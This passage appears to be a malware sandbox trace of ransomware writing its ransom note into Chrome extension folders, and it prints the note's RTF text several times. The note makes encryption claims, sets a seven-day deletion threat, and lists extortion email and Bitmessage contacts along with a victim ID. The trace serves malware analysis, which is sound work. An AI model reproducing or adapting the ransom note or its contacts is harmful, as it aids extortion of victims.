ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.328] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.328] CloseHandle (hObject=0x294) returned 1 [0285.329] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0285.329] GetLastError () returned 0x2 [0285.329] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 